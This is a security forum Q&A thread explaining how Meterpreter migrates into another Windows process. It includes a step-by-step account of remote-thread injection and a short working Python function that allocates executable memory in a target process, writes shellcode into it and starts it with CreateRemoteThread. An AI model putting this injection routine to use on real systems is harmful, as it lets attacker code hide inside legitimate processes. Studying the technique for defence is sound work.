19

Did anyone try to figure out how process migration works in Meterpreter in Windows? I want to make my own script to learn that, but am failing to find a starting point for that. Well, I have an idea to use NtQuerySystemInformation library and its SystemHandleInformation function, as it can return handle of a thread in the OS and using those I can change its parent, but I doubt that it's going to work (due to TEB). And I have a feeling that there should be an easier way than NtQuerySystemInformation. Could anyone suggest a DLL or an algorithm to use?

TildalWave
  • 10,801
  • 11
  • 45
  • 84
Artur Korobeynyk
  • 321
  • 1
  • 2
  • 6

2 Answers2

22

This is how migrate works in meterpreter:

  1. Get the PID the user wants to migrate into. This is the target process.
  2. Check the architecture of the target process whether it is 32 bit or 64 bit. It is important for memory alignment.
  3. Check if the meterpreter process has the SeDebugPrivilege. This is used to get a handle to the target process. Further details at http://support.microsoft.com/kb/131065
  4. Get the actual payload from the handler that is going to be injected into the target process. Calculate its length as well.
  5. Call the OpenProcess() API to gain access to the virtual memory of the target process.
  6. Call the VirtualAllocEx() API to allocate an RWX (Read, Write, Execute) memory in the target process
  7. Call the WriteProcessMemory() API to write the payload in the target memory virtual memory space.
  8. Call the CreateRemoteThread() API to execute the newly created memory stub having the injected payload in a new thread.
  9. Shutdown the previous thread having the initial meterpreter running in the old process.
void_in
  • 5,541
  • 1
  • 20
  • 28
  • 1
    This is pretty much spot on. The only thing that's worth mentioning on top of this is that there's a little bit of magic required to make it possible to run code in x64 processes from x86 processes. – OJ. May 09 '16 at 09:26
2

Somewhere in the deepest places of github I've found this code which does all the necessary stuff, so those who look for this info can find an answer in the below API functions:

def injectshellcode(self, shellcode):
    """This function merely executes what it is given"""
    shellcodeaddress = self.kernel32.VirtualAllocEx(
                                                    self.handle,
                                                    None,
                                                    len(shellcode),
                                                    0x1000,
                                                    0x40
                                                    )
    self.kernel32.WriteProcessMemory(
                                    self.handle,
                                    shellcodeaddress,
                                    shellcode,
                                    len(shellcode),
                                    None
                                    )
    thread = self.kernel32.CreateRemoteThread(
                                    self.handle,
                                    None,
                                    0,
                                    shellcodeaddress,
                                    None,
                                    0,
                                    None
                                    )
Artur Korobeynyk
  • 321
  • 1
  • 2
  • 6